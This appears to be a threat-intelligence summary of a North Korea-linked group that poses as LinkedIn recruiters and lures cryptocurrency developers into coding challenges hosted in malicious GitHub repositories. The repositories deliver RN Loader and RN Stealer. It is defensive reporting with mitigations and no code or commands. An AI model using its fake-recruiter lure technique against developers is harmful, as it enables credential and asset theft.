Full Report
Posing as potential employers, Slow Pisces hackers conceal malware in coding challenges sent to cryptocurrency developers on LinkedIn
Analysis Summary
# Threat Actor: Slow Pisces
## Attribution & Identity
Affiliated with the North Korean regime. Also referred to as Slow Pisces by Unit 42 (Palo Alto Networks' research branch).
## Activity Summary
Researchers observed a new malicious campaign initiated in 2024. The group targets developers associated with cryptocurrency projects by posing as recruiters on LinkedIn. They use PDF lures containing job descriptions, and if the target responds, they administer a coding challenge that directs victims to malicious GitHub repositories containing malware payloads.
## Tactics, Techniques & Procedures
- **Social Engineering:** Impersonating recruiters on LinkedIn to establish contact.
- **Delivery via Lure:** Using seemingly benign PDF documents as the initial lure.
- **Malicious Payload Hosting:** Hosting malicious code/repositories on GitHub.
- **Exploitation of Trust:** Leveraging professional platforms (LinkedIn) and technical challenges (coding tasks) to gain developer trust.
- **Payload Deployment:** Delivery of custom malware payloads (RN Loader and RN Stealer).
## Targeting
- **Sectors:** Cryptocurrency projects/developers.
- **Geography:** Not explicitly stated, but targeting is dependent on individuals working in the crypto space globally.
- **Victims:** Developers specifically involved in cryptocurrency projects.
## Tools & Infrastructure
- **Malware families used:** RN Loader and RN Stealer (new payloads identified by Unit 42).
- **Infrastructure (C2, domains, IPs):** Malicious repositories hosted on GitHub.
## Implications
Slow Pisces is utilizing sophisticated social engineering techniques targeting a high-value technical sector (cryptocurrency) to deploy custom infostealers, likely for financial gain or intelligence collection related to blockchain technology/assets. The use of recognized platforms like LinkedIn and GitHub makes detection challenging for security tools not focused on LNK/PDF-based delivery chained through social engineering.
## Mitigations
- Developers, especially those in crypto projects, should exercise extreme caution regarding unsolicited job offers or coding challenges received via professional networking sites like LinkedIn.
- Vet external links, especially those leading to code repositories, even if presented as part of a job interview process.
- Enhance endpoint detection focused on identifying suspicious execution chains originating from documents (PDFs) that attempt to download or pull external code/repositories.